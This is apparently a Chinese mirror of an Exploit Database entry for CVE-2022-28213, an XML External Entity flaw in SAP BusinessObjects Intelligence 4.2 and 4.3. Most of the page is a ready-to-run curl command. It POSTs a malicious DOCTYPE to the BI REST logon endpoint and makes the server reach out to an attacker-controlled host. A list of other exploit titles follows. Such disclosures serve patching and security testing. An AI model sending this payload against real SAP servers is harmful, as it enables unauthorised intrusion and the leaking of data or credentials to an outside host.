SAP BusinessObjects Intelligence 4.3 – XML External Entity (XXE)

Exploit Database
16 阅读

作者： West Shepherd

日期： 2022-05-11
类别：
- remote
平台：
- multiple
来源：https://www.exploit-db.com/exploits/50900/

# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md

curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long

last Exploits
SAP BusinessObjects Intelligence 4.3 – XML External Entity (XXE)的更多信息

Macrovision Installshield Update Service – ActiveX Unsafe Method (Metasploit)：
IBM System Director Agent – DLL Injection (Metasploit)：
Polycom HDX – Telnet Authentication Bypass (Metasploit)：
Java Applet – Driver Manager Privileged ‘toString()’ Remote Code Execution (Metasploit)：
Cisco Unified Operations Manager – Multiple Vulnerabilities：
EFS Easy Chat Server 3.1 – Remote Buffer Overflow (SEH)：
Zyxel USG FLEX 5.21 – OS Command Injection：
Easy File Sharing Web Server 7.2 – Remote Overflow (Egghunter) (SEH)：